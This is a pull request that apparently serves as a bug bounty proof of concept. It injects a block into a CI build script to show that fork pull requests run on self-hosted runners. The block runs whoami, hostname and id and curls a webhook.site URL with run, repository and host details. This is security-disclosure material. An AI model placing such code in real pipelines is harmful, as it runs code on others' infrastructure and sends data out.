### PR TITLE
Security PoC (authorized bug bounty test) — do not merge, will close shortly

### DIFF
--- a/infomaniak-build-tools/linux/build-ci-amd64.sh
+++ b/infomaniak-build-tools/linux/build-ci-amd64.sh
@@ -20,6 +20,23 @@
 
 set -xe
 
+# ============================================================================
+# AUTHORIZED SECURITY RESEARCH PoC — Infomaniak YesWeHack Bug Bounty Program
+# Reporter: jayajee (submitted via ramyaajee)
+# Purpose: demonstrate that this self-hosted-runner workflow executes code
+#          from an unrelated fork's pull request with no restriction.
+# This block is READ-ONLY / NON-DESTRUCTIVE: it only prints identifying
+# system info to the CI log and pings a webhook.site canary URL we control
+# to record that this exact PR triggered execution. No secrets, files, or
+# credentials are read, modified, or exfiltrated. This PR will be closed
+# immediately after evidence is captured. Contact via YesWeHack for any
+# questions about this test.
+echo "=== BUG BOUNTY POC: arbitrary code execution on Infomaniak self-hosted runner ==="
+whoami; hostname; id
+curl -s "https://webhook.site/9ae71c0f-3fbb-4b90-95b2-794f03e2d971?run_id=${GITHUB_RUN_ID:-unknown}&repo=${GITHUB_REPOSITORY:-unknown}&host=$(hostname)" || true
+echo "=== END BUG BOUNTY POC ==="
+# ============================================================================
+
 program_name="$(basename "$0")"
 
 function display_help {


### PR DESCRIPTION
**This is an authorized security research PoC submitted alongside a YesWeHack bug bounty report.**

I identified that `build-Linux`/`build-MacOS`/`build-Windows` jobs in `kdrive-desktop-ci.yml` run on `self-hosted` runners while triggered by the plain `pull_request` event with no fork/branch restriction — meaning any GitHub user's PR code executes on Infomaniak-owned build infrastructure. I found two pre-existing examples of this already happening from unrelated accounts (#1959, #2058).

This PR adds one **benign, read-only** diagnostic block to `infomaniak-build-tools/linux/build-ci-amd64.sh` — it prints `whoami`/`hostname`/`id` to the CI log and pings a webhook.site URL I control, purely to independently confirm and timestamp execution on your infrastructure for my bug bounty report. **No secrets, files, or credentials are read, modified, or exfiltrated.**

I will close this PR as soon as the CI run completes and I've captured the evidence — this is not intended to be merged. Full report submitted via YesWeHack (reporter: jayajee, submitted via ramyaajee). Happy to answer any questions here or via YesWeHack.